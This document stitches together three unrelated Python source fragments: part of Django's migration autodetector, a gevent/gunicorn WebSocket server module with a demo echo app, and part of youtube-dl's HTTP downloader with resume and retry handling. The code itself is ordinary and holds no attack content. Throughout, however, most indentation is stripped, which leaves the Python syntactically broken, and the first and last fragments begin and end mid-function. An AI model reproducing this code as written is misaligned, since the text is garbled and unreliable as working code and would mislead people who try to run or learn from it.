        for proxy models we can skip all the field handling and just emit
        the operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy")
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
deleted_models = set(self.old_model_keys) - new_keys
deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in all_deleted_models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.remote_field:
if field.remote_field.model:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.remote_field.model:
related_fields[field.name] = field
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.related_objects:
related_object_app_label = related_object.related_model._meta.app_label
object_name = related_object.related_model._meta.object_name
field_name = related_object.field.name
dependencies.append((related_object_app_label, object_name, field_name, False))
if not related_object.many_to_many:
dependencies.append((related_object_app_label, object_name, field_name, "alter"))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name_lower))
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy")
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
        Works out renamed fields, generating RenameField operations for them.
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.remote_field and field.remote_field.model and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
        Fields that have been added.
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.remote_field and field.remote_field.model:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.remote_field.model._meta.app_label
dep_object_name = field.remote_field.model._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
dependencies.append((
field.remote_field.through._meta.app_label,
field.remote_field.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
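        # Example, added for illustration: adding models.CharField(max_length=10)
        # (non-null, no default, blank=False) falls into the branch below, so
        # the questioner supplies a one-off default and preserve_default is
        # cleared.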
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "remote_field") and getattr(new_field.remote_field, "model", None):
rename_key = (
new_field.remote_field.model._meta.app_label,
new_field.remote_field.model._meta.model_name,
)
if rename_key in self.renamed_models:
new_field.remote_field.model = old_field.remote_field.model
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
both_m2m = (
isinstance(old_field, models.ManyToManyField) and
isinstance(new_field, models.ManyToManyField)
)
neither_m2m = (
not isinstance(old_field, models.ManyToManyField) and
not isinstance(new_field, models.ManyToManyField)
)
if both_m2m or neither_m2m:
# Either both fields are m2m or neither is
preserve_default = True
if (old_field.null and not new_field.null and not new_field.has_default() and
not isinstance(new_field, models.ManyToManyField)):
field = new_field.clone()
new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
if new_default is not models.NOT_PROVIDED:
field.default = new_default
preserve_default = False
else:
field = new_field
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
)
)
else:
# We cannot alter between m2m and concrete fields
self._generate_removed_field(app_label, model_name, field_name)
self._generate_added_field(app_label, model_name, field_name)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to") !=
new_model_state.options.get("order_with_respect_to")):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to"):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to'),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
        Takes changes from arrange_for_graph and a set of app labels, and
        returns a modified set of changes which trims out as many migrations
        as possible that are not in app_labels.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
        but we put some effort into the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
if re.match(r"^\d+_", name):
return int(name.split("_")[0])
return None
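    # For example: parse_number("0002_remove_field") == 2, while
    # parse_number("initial") returns None since there is no leading
    # "<digits>_" prefix.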
|
|
import collections
import errno
import re
from hashlib import sha1
import base64
from base64 import b64encode, b64decode
import socket
import struct
import logging
from socket import error as SocketError
import gevent
from gunicorn.workers.async import ALREADY_HANDLED
logger = logging.getLogger(__name__)
WS_KEY = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
class WebSocketWSGI(object):
def __init__(self, handler):
self.handler = handler
def verify_client(self, ws):
pass
def _get_key_value(self, key_value):
if not key_value:
return
key_number = int(re.sub("\\D", "", key_value))
spaces = re.subn(" ", "", key_value)[1]
if key_number % spaces != 0:
return
part = key_number / spaces
return part
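    # A minimal illustration (not from the hixie-76 spec): for key_value
    # "12 3" the digits form key_number 123 and there is 1 space, so this
    # returns 123; if the digit value is not divisible by the space count,
    # the method falls through and returns None.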
def __call__(self, environ, start_response):
        if not (environ.get('HTTP_CONNECTION', '').find('Upgrade') != -1 and
                environ.get('HTTP_UPGRADE', '').lower() == 'websocket'):
# need to check a few more things here for true compliance
start_response('400 Bad Request', [('Connection','close')])
return []
sock = environ['gunicorn.socket']
version = environ.get('HTTP_SEC_WEBSOCKET_VERSION')
ws = WebSocket(sock, environ, version)
handshake_reply = ("HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n")
key = environ.get('HTTP_SEC_WEBSOCKET_KEY')
if key:
ws_key = base64.b64decode(key)
if len(ws_key) != 16:
start_response('400 Bad Request', [('Connection','close')])
return []
protocols = []
subprotocols = environ.get('HTTP_SEC_WEBSOCKET_PROTOCOL')
ws_protocols = []
if subprotocols:
for s in subprotocols.split(','):
s = s.strip()
if s in protocols:
ws_protocols.append(s)
if ws_protocols:
handshake_reply += 'Sec-WebSocket-Protocol: %s\r\n' % ', '.join(ws_protocols)
exts = []
extensions = environ.get('HTTP_SEC_WEBSOCKET_EXTENSIONS')
ws_extensions = []
if extensions:
for ext in extensions.split(','):
ext = ext.strip()
if ext in exts:
ws_extensions.append(ext)
if ws_extensions:
handshake_reply += 'Sec-WebSocket-Extensions: %s\r\n' % ', '.join(ws_extensions)
handshake_reply += (
"Sec-WebSocket-Origin: %s\r\n"
"Sec-WebSocket-Location: ws://%s%s\r\n"
"Sec-WebSocket-Version: %s\r\n"
"Sec-WebSocket-Accept: %s\r\n\r\n"
% (
environ.get('HTTP_ORIGIN'),
environ.get('HTTP_HOST'),
ws.path,
version,
base64.b64encode(sha1(key + WS_KEY).digest())
))
else:
handshake_reply += (
"WebSocket-Origin: %s\r\n"
"WebSocket-Location: ws://%s%s\r\n\r\n" % (
environ.get('HTTP_ORIGIN'),
environ.get('HTTP_HOST'),
ws.path))
sock.sendall(handshake_reply)
try:
self.handler(ws)
except socket.error as e:
if e[0] != errno.EPIPE:
raise
        # use this undocumented feature of gunicorn to ensure that it
        # doesn't barf on the fact that we didn't call start_response
return ALREADY_HANDLED
class WebSocket(object):
"""A websocket object that handles the details of
serialization/deserialization to the socket.
The primary way to interact with a :class:`WebSocket` object is to
call :meth:`send` and :meth:`wait` in order to pass messages back
and forth with the browser. Also available are the following
properties:
path
The path value of the request. This is the same as the WSGI PATH_INFO variable, but more convenient.
protocol
The value of the Websocket-Protocol header.
origin
The value of the 'Origin' header.
environ
The full WSGI environment for this request.
"""
def __init__(self, sock, environ, version=76):
"""
:param socket: The eventlet socket
:type socket: :class:`eventlet.greenio.GreenSocket`
:param environ: The wsgi environment
:param version: The WebSocket spec version to follow (default is 76)
"""
self.socket = sock
self.origin = environ.get('HTTP_ORIGIN')
self.protocol = environ.get('HTTP_WEBSOCKET_PROTOCOL')
self.path = environ.get('PATH_INFO')
self.environ = environ
self.version = version
self.websocket_closed = False
self._buf = ""
self._msgs = collections.deque()
#self._sendlock = semaphore.Semaphore()
@staticmethod
def encode_hybi(buf, opcode, base64=False):
""" Encode a HyBi style WebSocket frame.
Optional opcode:
0x0 - continuation
0x1 - text frame (base64 encode buf)
0x2 - binary frame (use raw buf)
0x8 - connection close
0x9 - ping
0xA - pong
"""
if base64:
buf = b64encode(buf)
b1 = 0x80 | (opcode & 0x0f) # FIN + opcode
payload_len = len(buf)
if payload_len <= 125:
header = struct.pack('>BB', b1, payload_len)
elif payload_len > 125 and payload_len < 65536:
header = struct.pack('>BBH', b1, 126, payload_len)
elif payload_len >= 65536:
header = struct.pack('>BBQ', b1, 127, payload_len)
#print("Encoded: %s" % repr(header + buf))
return header + buf, len(header), 0
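    # For example (a sketch): encode_hybi("hello", opcode=0x1) builds
    # b1 = 0x80 | 0x1 = 0x81 and the 2-byte header '\x81\x05', returning
    # ('\x81\x05hello', 2, 0).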
@staticmethod
def decode_hybi(buf, base64=False):
""" Decode HyBi style WebSocket packets.
Returns:
{'fin' : 0_or_1,
'opcode' : number,
'mask' : 32_bit_number,
'hlen' : header_bytes_number,
'length' : payload_bytes_number,
'payload' : decoded_buffer,
'left' : bytes_left_number,
'close_code' : number,
'close_reason' : string}
"""
f = {'fin' : 0,
'opcode' : 0,
'mask' : 0,
'hlen' : 2,
'length' : 0,
'payload' : None,
'left' : 0,
'close_code' : None,
'close_reason' : None}
blen = len(buf)
f['left'] = blen
if blen < f['hlen']:
return f # Incomplete frame header
b1, b2 = struct.unpack_from(">BB", buf)
f['opcode'] = b1 & 0x0f
f['fin'] = (b1 & 0x80) >> 7
has_mask = (b2 & 0x80) >> 7
f['length'] = b2 & 0x7f
if f['length'] == 126:
f['hlen'] = 4
if blen < f['hlen']:
return f # Incomplete frame header
(f['length'],) = struct.unpack_from('>xxH', buf)
elif f['length'] == 127:
f['hlen'] = 10
if blen < f['hlen']:
return f # Incomplete frame header
(f['length'],) = struct.unpack_from('>xxQ', buf)
full_len = f['hlen'] + has_mask * 4 + f['length']
if blen < full_len: # Incomplete frame
return f # Incomplete frame header
# Number of bytes that are part of the next frame(s)
f['left'] = blen - full_len
# Process 1 frame
if has_mask:
# unmask payload
f['mask'] = buf[f['hlen']:f['hlen']+4]
b = c = ''
if f['length'] >= 4:
data = struct.unpack('<I', buf[f['hlen']:f['hlen']+4])[0]
of1 = f['hlen']+4
b = ''
for i in xrange(0, int(f['length']/4)):
mask = struct.unpack('<I', buf[of1+4*i:of1+4*(i+1)])[0]
b += struct.pack('I', data ^ mask)
if f['length'] % 4:
l = f['length'] % 4
of1 = f['hlen']
of2 = full_len - l
c = ''
for i in range(0, l):
mask = struct.unpack('B', buf[of1 + i])[0]
data = struct.unpack('B', buf[of2 + i])[0]
c += chr(data ^ mask)
f['payload'] = b + c
else:
print("Unmasked frame: %s" % repr(buf))
f['payload'] = buf[(f['hlen'] + has_mask * 4):full_len]
if base64 and f['opcode'] in [1, 2]:
try:
f['payload'] = b64decode(f['payload'])
except:
print("Exception while b64decoding buffer: %s" %
repr(buf))
raise
if f['opcode'] == 0x08:
if f['length'] >= 2:
f['close_code'] = struct.unpack_from(">H", f['payload'])
if f['length'] > 3:
f['close_reason'] = f['payload'][2:]
return f
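    # For example (a sketch): decoding the unmasked frame '\x81\x05hello'
    # yields fin=1, opcode=0x1, hlen=2, length=5, payload='hello' and
    # left=0, i.e. one complete text frame with nothing remaining.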
@staticmethod
def _pack_message(message):
"""Pack the message inside ``00`` and ``FF``
As per the dataframing section (5.3) for the websocket spec
"""
if isinstance(message, unicode):
message = message.encode('utf-8')
elif not isinstance(message, str):
message = str(message)
packed = "\x00%s\xFF" % message
return packed
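    # For example: _pack_message("hi") returns "\x00hi\xff", i.e. the
    # message framed by the 0x00 and 0xFF sentinel bytes of the pre-HyBi
    # draft protocol.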
def _parse_messages(self):
""" Parses for messages in the buffer *buf*. It is assumed that
the buffer contains the start character for a message, but that it
may contain only part of the rest of the message.
Returns an array of messages, and the buffer remainder that
didn't contain any full messages."""
msgs = []
end_idx = 0
buf = self._buf
while buf:
if self.version in ['7', '8', '13']:
frame = self.decode_hybi(buf, base64=False)
#print("Received buf: %s, frame: %s" % (repr(buf), frame))
                if frame['payload'] is None:
break
else:
if frame['opcode'] == 0x8: # connection close
self.websocket_closed = True
break
#elif frame['opcode'] == 0x1:
else:
                        msgs.append(frame['payload'])
#msgs.append(frame['payload'].decode('utf-8', 'replace'));
#buf = buf[-frame['left']:]
if frame['left']:
buf = buf[-frame['left']:]
else:
buf = ''
else:
frame_type = ord(buf[0])
if frame_type == 0:
# Normal message.
end_idx = buf.find("\xFF")
if end_idx == -1: #pragma NO COVER
break
msgs.append(buf[1:end_idx].decode('utf-8', 'replace'))
buf = buf[end_idx+1:]
elif frame_type == 255:
# Closing handshake.
assert ord(buf[1]) == 0, "Unexpected closing handshake: %r" % buf
self.websocket_closed = True
break
else:
raise ValueError("Don't understand how to parse this type of message: %r" % buf)
self._buf = buf
return msgs
def send(self, message):
"""Send a message to the browser.
        *message* should be convertible to a string; unicode objects should be
encodable as utf-8. Raises socket.error with errno of 32
(broken pipe) if the socket has already been closed by the client."""
if self.version in ['7', '8', '13']:
packed, lenhead, lentail = self.encode_hybi(message, opcode=0x01, base64=False)
else:
packed = self._pack_message(message)
# if two greenthreads are trying to send at the same time
# on the same socket, sendlock prevents interleaving and corruption
#self._sendlock.acquire()
try:
self.socket.sendall(packed)
finally:
pass
#self._sendlock.release()
def wait(self):
"""Waits for and deserializes messages.
Returns a single message; the oldest not yet processed. If the client
has already closed the connection, returns None. This is different
from normal socket behavior because the empty string is a valid
websocket message."""
while not self._msgs:
# Websocket might be closed already.
if self.websocket_closed:
return None
# no parsed messages, must mean buf needs more data
delta = self.socket.recv(8096)
if delta == '':
return None
self._buf += delta
msgs = self._parse_messages()
self._msgs.extend(msgs)
return self._msgs.popleft()
def _send_closing_frame(self, ignore_send_errors=False):
"""Sends the closing frame to the client, if required."""
if self.version in ['7', '8', '13'] and not self.websocket_closed:
msg = ''
#if code != None:
# msg = struct.pack(">H%ds" % (len(reason)), code)
buf, h, t = self.encode_hybi(msg, opcode=0x08, base64=False)
self.socket.sendall(buf)
self.websocket_closed = True
elif self.version == 76 and not self.websocket_closed:
try:
self.socket.sendall("\xff\x00")
except SocketError:
# Sometimes, like when the remote side cuts off the connection,
# we don't care about this.
if not ignore_send_errors: #pragma NO COVER
raise
self.websocket_closed = True
def close(self):
"""Forcibly close the websocket; generally it is preferable to
return from the handler method."""
self._send_closing_frame()
self.socket.shutdown(True)
self.socket.close()
# demo app
import os
import random
def handle(ws):
""" This is the websocket handler function. Note that we
can dispatch based on path in here, too."""
if ws.path == '/echo':
while True:
m = ws.wait()
if m is None:
break
ws.send(m)
elif ws.path == '/data':
for i in xrange(10000):
ws.send("0 %s %s\n" % (i, random.random()))
gevent.sleep(0.1)
wsapp = WebSocketWSGI(handle)
def app(environ, start_response):
""" This resolves to the web page or the websocket depending on
the path."""
if environ['PATH_INFO'] == '/' or environ['PATH_INFO'] == "":
data = open(os.path.join(
os.path.dirname(__file__),
'websocket.html')).read()
data = data % environ
start_response('200 OK', [('Content-Type', 'text/html'),
('Content-Length', len(data))])
return [data]
else:
return wsapp(environ, start_response)
|
|
from __future__ import unicode_literals
import errno
import os
import socket
import time
import re
from .common import FileDownloader
from ..compat import compat_urllib_error
from ..utils import (
ContentTooShortError,
encodeFilename,
sanitize_open,
sanitized_Request,
)
class HttpFD(FileDownloader):
def real_download(self, filename, info_dict):
url = info_dict['url']
tmpfilename = self.temp_name(filename)
stream = None
# Do not include the Accept-Encoding header
headers = {'Youtubedl-no-compression': 'True'}
add_headers = info_dict.get('http_headers')
if add_headers:
headers.update(add_headers)
basic_request = sanitized_Request(url, None, headers)
request = sanitized_Request(url, None, headers)
is_test = self.params.get('test', False)
if is_test:
request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))
# Establish possible resume length
if os.path.isfile(encodeFilename(tmpfilename)):
resume_len = os.path.getsize(encodeFilename(tmpfilename))
else:
resume_len = 0
open_mode = 'wb'
if resume_len != 0:
if self.params.get('continuedl', True):
self.report_resuming_byte(resume_len)
request.add_header('Range', 'bytes=%d-' % resume_len)
open_mode = 'ab'
else:
resume_len = 0
count = 0
retries = self.params.get('retries', 0)
while count <= retries:
# Establish connection
try:
data = self.ydl.urlopen(request)
                # When trying to resume, the Content-Range HTTP header of the
                # response has to be checked to match the value of the requested
                # Range HTTP header. This is due to webservers that don't support
                # resuming and serve the whole file with no Content-Range set in
                # the response despite the requested Range (see
                # https://github.com/rg3/youtube-dl/issues/6057#issuecomment-126129799)
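                # For example (illustrative): after requesting "Range: bytes=500-",
                # a response of "Content-Range: bytes 500-999/1000" matches
                # resume_len and resuming proceeds; a missing or mismatched
                # header triggers the full redownload handled below.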
if resume_len > 0:
content_range = data.headers.get('Content-Range')
if content_range:
content_range_m = re.search(r'bytes (\d+)-', content_range)
# Content-Range is present and matches requested Range, resume is possible
if content_range_m and resume_len == int(content_range_m.group(1)):
break
                    # Content-Range is either not present or invalid. Assume the
                    # remote webserver is sending the whole file; resuming is not
                    # possible, so wipe the local file and redownload from scratch
self.report_unable_to_resume()
resume_len = 0
open_mode = 'wb'
break
except (compat_urllib_error.HTTPError, ) as err:
if (err.code < 500 or err.code >= 600) and err.code != 416:
# Unexpected HTTP error
raise
elif err.code == 416:
# Unable to resume (requested range not satisfiable)
try:
# Open the connection again without the range header
data = self.ydl.urlopen(basic_request)
content_length = data.info()['Content-Length']
except (compat_urllib_error.HTTPError, ) as err:
if err.code < 500 or err.code >= 600:
raise
else:
# Examine the reported length
if (content_length is not None and
(resume_len - 100 < int(content_length) < resume_len + 100)):
# The file had already been fully downloaded.
# Explanation to the above condition: in issue #175 it was revealed that
# YouTube sometimes adds or removes a few bytes from the end of the file,
# changing the file size slightly and causing problems for some users. So
# I decided to implement a suggested change and consider the file
# completely downloaded if the file size differs less than 100 bytes from
# the one in the hard drive.
self.report_file_already_downloaded(filename)
self.try_rename(tmpfilename, filename)
self._hook_progress({
'filename': filename,
'status': 'finished',
'downloaded_bytes': resume_len,
'total_bytes': resume_len,
})
return True
else:
# The length does not match, we start the download over
self.report_unable_to_resume()
resume_len = 0
open_mode = 'wb'
break
except socket.error as e:
if e.errno != errno.ECONNRESET:
# Connection reset is no problem, just retry
raise
# Retry
count += 1
if count <= retries:
self.report_retry(count, retries)
if count > retries:
self.report_error('giving up after %s retries' % retries)
return False
data_len = data.info().get('Content-length', None)
# Range HTTP header may be ignored/unsupported by a webserver
# (e.g. extractor/scivee.py, extractor/bambuser.py).
# However, for a test we still would like to download just a piece of a file.
# To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
# block size when downloading a file.
if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
data_len = self._TEST_FILE_SIZE
if data_len is not None:
data_len = int(data_len) + resume_len
min_data_len = self.params.get('min_filesize')
max_data_len = self.params.get('max_filesize')
if min_data_len is not None and data_len < min_data_len:
self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
return False
if max_data_len is not None and data_len > max_data_len:
self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
return False
        byte_counter = resume_len
block_size = self.params.get('buffersize', 1024)
start = time.time()
# measure time over whole while-loop, so slow_down() and best_block_size() work together properly
now = None # needed for slow_down() in the first loop run
